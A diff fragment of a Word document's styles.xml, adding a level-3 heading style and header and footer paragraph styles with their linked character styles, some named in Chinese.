+    <w:basedOn w:val="a"/>
+    <w:next w:val="a"/>
+    <w:link w:val="30"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="006E542D"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -2979,6 +2992,84 @@
       <w:color w:val="000000"/>
       <w:sz w:val="22"/>
       <w:szCs w:val="22"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a5">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="a6"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="006E542D"/>
+    <w:pPr>
+      <w:pBdr>
+        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
+      </w:pBdr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4153"/>
+        <w:tab w:val="right" w:pos="8306"/>
+      </w:tabs>
+      <w:snapToGrid w:val="0"/>
+      <w:jc w:val="center"/>
+    </w:pPr>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
+    <w:name w:val="页眉 字符"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="a5"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="006E542D"/>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a7">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="a8"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="006E542D"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4153"/>
+        <w:tab w:val="right" w:pos="8306"/>
+      </w:tabs>
+      <w:snapToGrid w:val="0"/>
+      <w:jc w:val="left"/>
+    </w:pPr>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="a8">
+    <w:name w:val="页脚 字符"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="a7"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="006E542D"/>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="30">
+    <w:name w:val="标题 3 字符"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="3"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="006E542D"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
 </w:styles>
